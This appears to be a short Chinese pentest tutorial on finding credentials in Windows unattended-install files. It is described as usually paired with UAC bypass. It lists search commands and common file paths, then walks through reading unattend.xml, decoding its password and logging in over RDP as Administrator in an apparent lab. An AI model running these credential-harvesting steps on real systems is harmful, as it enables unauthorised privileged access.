一般配合BypassUAC
原理
一些 windows 无人值守安装文件中含有用户的明文或 base64 编码后的密文。
无人值守安装文件中的密码不一定是管理员密码,它也可能是普通用户的密码或者服务账户的密码。
不过,在无人值守文件(如 sysprep.xml
或 unattend.xml
)中,有时会包含管理员账户的密码设置,尤其是在自动化部署场景下。
命令
cd C:\
dir /s *sysprep.inf *sysprep.xml *unattend.xml *unattend.txt 2>nul
常见位置:
-
C:\sysprep.inf
-
C:\sysprep\sysprep.xml
-
C:\Windows\system32\sysprep.inf
-
C:\Windows\system32\sysprep\sysprep.xml
-
C:\Windows\Panther\Unattend\Unattended.xml
-
C:\Windows\Panther\Unattend\Unattend.xml
-
C:\Windos\System32\sysprep\unattend.xml
-
C:\Windows\System32\Sysprep\Panther\unattend.xml
案例
到C盘根目录下搜索
cd C:\
dir /s *sysprep.inf *sysprep.xml *unattend.xml *unattend.txt 2>nul
查看权限
icacls "C:\Windows\System32\Sysprep\Panther\unattend.xml"
普通用户可读
尝试读取
type C:\Windows\System32\Sysprep\Panther\unattend.xml
解码
尝试登录
xfreerdp /u:Administrator /p:20010505 /v:192.168.74.130 /cert:ignore